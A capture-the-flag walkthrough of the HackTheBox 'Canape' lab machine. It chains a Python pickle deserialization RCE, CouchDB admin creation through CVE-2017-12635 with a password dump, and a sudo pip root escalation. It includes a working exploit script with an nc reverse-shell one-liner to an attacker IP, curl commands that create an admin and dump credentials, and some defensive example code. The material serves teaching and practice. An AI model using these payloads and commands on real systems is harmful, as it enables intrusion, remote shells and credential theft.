HackTheBox Writeup — Canape

Hello guys, I am Faisal Husaini and this is my first writeup on Medium, and also my first writeup on any platform on the web. My username on HTB is "faisalelino".
This writeup is on the Canape box, which is one of the hardest boxes on HTB. But the experience was great while solving this machine, as I learned a lot of stuff along the way.
The IP for this machine is 10.10.10.70, so let's get started.
NMAP Results

We see that port 80 is open, running Apache httpd 2.4.18. Also, if you look closely at the results, there is a /.git directory exposed on the web server. Let's see what it contains.
/.git
So we access http://10.10.10.70/.git in the browser and get

There is a directory listing, and a "config" file in it. Let's see what it contains

We see it has "url=http://git.canape.htb/simpsons.git", so let's clone the repository. Before that, we have to add "canape.htb" and "git.canape.htb" to our /etc/hosts file like this

Now let's clone the repository from the URL we got.

We get a simpsons folder containing some files; let's look at them.

We see it has an __init__.py file containing the application code. The main thing to point out is that it imports the cPickle module. The import on its own is only a hint; what matters is that data submitted through the web form is later handed to cPickle.loads, which means there is very likely a pickle deserialization (injection) vulnerability. Let's dig further.
Pickle Injection Vulnerability
As we suspected a pickle injection vulnerability, I referred to a blog to learn more about it, as I was not very familiar with this vulnerability.
We need to write a Python exploit script to trigger the vulnerability:
import os
import cPickle
from hashlib import md5
import requests

# Exploit that we want the target to unpickle. The site only accepts quotes
# attributed to a Simpsons character, which is why the command starts with
# "homer;" (that prefix ends up in the "character" field below).
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f',))

shellcode = cPickle.dumps(Exploit())
print shellcode + "\n"
print md5(shellcode).hexdigest()

# The app stores character + quote verbatim and unpickles it on /check, so we
# split the pickle at the ';' separators and reassemble it through the form.
part1 = str(shellcode.split(";")[0])
part2 = str(";" + shellcode.split(";")[1])
part3 = str(";" + shellcode.split(";")[2])
part4 = str(";" + shellcode.split(";")[3])

r = requests.post("http://10.10.10.70/submit", data={'character': str(part1), 'quote': str(part2 + part3 + part4)})
print(r.status_code, r.reason, r.text)

# The stored blob is addressed by md5(character + quote), i.e. md5(shellcode).
r2 = requests.post("http://10.10.10.70/check", data={'id': md5(shellcode).hexdigest()})
print(r2.status_code, r2.reason, r2.text)
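To make clear what the exploit above is abusing, here is an added example (my own code, not the Canape application's source and not the writeup's script) that models the vulnerable submit/check flow in Python 3 and puts a hardened unpickler next to it. The whitelist contents, the field handling and the "p1" sniff test are assumptions drawn from how the exploit is built; the gadget calls subprocess.check_output instead of os.system so the effect is observable offline.

```python
import io
import pickle
import subprocess

# Assumed whitelist: the real app only accepts quotes attributed to a Simpsons
# character, which is why the writeup's payload starts with "homer;".
WHITELIST = ["homer", "marge", "bart", "lisa", "maggie"]


class Gadget(object):
    """An object whose __reduce__ makes the unpickler call an arbitrary callable.

    On the box the writeup uses os.system with a reverse-shell one-liner; here
    the callable is subprocess.check_output so the result can be inspected.
    """

    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        return (subprocess.check_output, (self.argv,))


def build_payload():
    # Constructed payload: "homer;pwned" keeps a whitelisted name in front of
    # the first ';' exactly like the writeup's "homer;rm /tmp/f;..." string.
    return pickle.dumps(Gadget(["echo", "homer;pwned"]), protocol=0)


def build_form_fields(payload, whitelist=WHITELIST):
    """Split a protocol-0 pickle into the 'character' and 'quote' form fields.

    The server stores character + quote verbatim, so cutting the bytes at the
    first ';' reproduces the writeup's part1 / part2+part3+part4 trick.
    """
    text = payload.decode("latin-1")
    head, sep, tail = text.partition(";")
    if not any(name in head.lower() for name in whitelist):
        raise ValueError("character field would fail the whitelist check")
    return head, sep + tail


def vulnerable_check(stored):
    """Model of the /check handler: unpickles the stored blob if it looks pickled."""
    if b"p1" in stored:
        return pickle.loads(stored)  # the attacker's callable runs here
    return stored


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened variant: refuse to resolve any global, so no callable can run."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def hardened_check(stored):
    if b"p1" in stored:
        return RestrictedUnpickler(io.BytesIO(stored)).load()
    return stored


def hardened_blocks(stored):
    """True if the hardened handler refuses the payload instead of running it."""
    try:
        hardened_check(stored)
    except pickle.UnpicklingError:
        return True
    return False


def demo():
    """Submit the split payload, then trigger /check: returns echo's output."""
    payload = build_payload()
    character, quote = build_form_fields(payload)
    stored = (character + quote).encode("latin-1")  # what the app writes to disk
    assert stored == payload
    return vulnerable_check(stored)
```

The real fix is not a restricted unpickler but not unpickling request-derived data at all (a JSON document would carry the same character/quote pair safely); the restricted class is shown only to make the gadget's dependence on find_class visible.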
After getting everything ready, we set up a netcat listener on port 1234 (the port given in python-exploit.py for the reverse connection), and run the exploit.

Cool! We got a reverse connection. Now let's dig further.
As we have a shell, let's upgrade it to a proper TTY by spawning a pty from Python.

CouchDB Privilege Escalation
As we are www-data, we can't access the user "homer" on this box.
Let's run "ps aux | grep homer" and see what processes are running as the homer user.

We can see that it is running CouchDB, so let's search for CouchDB exploits or privilege escalation methods.
Here we use curl commands to create an admin user in the CouchDB database and then dump the users and passwords stored in it. Note the deliberately duplicated "roles" key in the JSON body: the first value (["_admin"]) is the one that gets stored, while the validation function that is supposed to stop ordinary users from granting themselves roles only sees the second, empty one (CVE-2017-12635, the CouchDB bug described in the justi.cz reference at the end).
curl -X PUT 'http://127.0.0.1:5984/_users/org.couchdb.user:faisal' --data-binary '{"type":"user","name":"faisal","roles":["_admin"],"roles":[],"password":"toor"}'

We have successfully created the user; to confirm, we use the command below:
curl -X GET 'http://faisal:toor@127.0.0.1:5984/_users/_all_docs'

This confirms that the user we created exists in the _users database.
Now we dump the usernames and passwords from the passwords database with the command below:
curl -X GET 'http://faisal:toor@127.0.0.1:5984/passwords/_all_docs?include_docs=true'
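Why the duplicated "roles" key in the PUT above gets past CouchDB's own check deserves a worked illustration. The following is an added example written for this page, not CouchDB code: it models the two JSON parsers involved with Python's json module. JavaScript's JSON.parse (which runs the _users validate_doc_update function) keeps the last duplicate key, while the Erlang side of vulnerable CouchDB versions kept the first. The validation rule is a simplified paraphrase of the real design document, and the document body is the one from the curl command.

```python
import json

# Constructed document: the same body as the curl command above, with "roles"
# given twice. Nothing here talks to CouchDB; it only models the two parsers.
USER_DOC = (
    '{"type":"user","name":"faisal","roles":["_admin"],"roles":[],"password":"toor"}'
)


def parse_last_wins(text):
    """JavaScript JSON.parse semantics (what validate_doc_update sees): last key wins."""
    return json.loads(text)


def parse_first_wins(text):
    """Model of the Erlang side in vulnerable CouchDB (what gets stored): first key wins."""
    def keep_first(pairs):
        doc = {}
        for key, value in pairs:
            doc.setdefault(key, value)
        return doc
    return json.loads(text, object_pairs_hook=keep_first)


def validate_doc_update(new_doc, user_ctx):
    """Simplified model of the _users design doc check: only _admin may set roles."""
    if "_admin" in user_ctx.get("roles", []):
        return True
    if new_doc.get("roles"):
        raise PermissionError("Only _admin may edit roles")
    return True


def escalate(doc_text, user_ctx):
    """Run validation as CouchDB's JS would, then return the roles actually stored."""
    validate_doc_update(parse_last_wins(doc_text), user_ctx)  # sees roles == []
    return parse_first_wins(doc_text)["roles"]                 # stores ["_admin"]


def parse_strict(text):
    """A parser that rejects duplicate keys removes the discrepancy the trick relies on."""
    def no_duplicates(pairs):
        doc = {}
        for key, value in pairs:
            if key in doc:
                raise ValueError("duplicate key: %s" % key)
            doc[key] = value
        return doc
    return json.loads(text, object_pairs_hook=no_duplicates)


def strict_rejects(text):
    """True if the strict parser refuses the document."""
    try:
        parse_strict(text)
    except ValueError:
        return True
    return False
```

escalate() with an anonymous user context (no name, no roles) passes validation and still yields ["_admin"] as the stored roles, which is exactly the state the curl command produces on the box; the same document is refused outright by parse_strict().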

From the dumped data, we can see that there is a password for the user "homer", which is "h02ddjdj2k2k2".
Let's try switching to that user with "su homer" and providing the password.

It fails, hmm. Also, we saw only port 80 open in the nmap scan we did, but the dump also has a password for ssh, i.e. "0B4jyA0xtytZi7esBNGp", with no user given.
Maybe it is the SSH password for the user "homer", but no SSH port showed up in our earlier nmap scan. A default nmap run only probes the 1000 most common ports, so let's scan all 65535 with the command below:
nmap -sV -sC 10.10.10.70 -p- --min-rate 1000

We see one more open port, 65535, which was a complete troll for me :P as I had been banging my head trying to connect as the "homer" user.
Let's try connecting as "homer" through SSH.
SSH Connection
We connect to SSH using the command below:
ssh homer@10.10.10.70 -p 65535
Password: 0B4jyA0xtytZi7esBNGp

Bingo! We got in. Now let's dig in and get the user flag and the root flag (which still requires a privilege escalation to root).

When we run "sudo -l", we see that we can execute /usr/bin/pip install * as root via sudo.
So let's exploit that. pip executes the setup.py of the package being installed as a script, and under sudo that script runs as root. First we write a setup.py that gives us a reverse shell when pip installs it, after setting up a netcat listener to catch the connection.

Here is our code, ready; now let's do the exploitation part.
We use the following command:
sudo /usr/bin/pip install . --upgrade --force-reinstall
Also set up an nc listener on our host machine.

All set, now time to exploit.

Voila!! We got root. Now time to get both flags!
Getting User Flag
The user flag is in the home directory of user "homer".

We got the user flag.
Getting Root Flag
The root flag is under the /root directory.

We got the root flag as well.
Vulnerabilities Used To Exploit This Box
Vulnerabilities in the box are as follows:
1) Python pickle injection → to get RCE and a low-privilege shell as www-data
2) CouchDB (unauthenticated admin creation via the duplicate "roles" key, then a credential dump) → to get user privileges from www-data
3) sudo rule allowing /usr/bin/pip install * → to get root access
References
Below are the links which helped me solve the box:
Python Pickle Injection:
→ https://blog.nelhage.com/2011/03/exploiting-pickle/
→ https://lincolnloop.com/blog/playing-pickle-security/
CouchDB Exploitation:
→ https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
→ https://wiki.apache.org/couchdb/How_to_create_users_via_script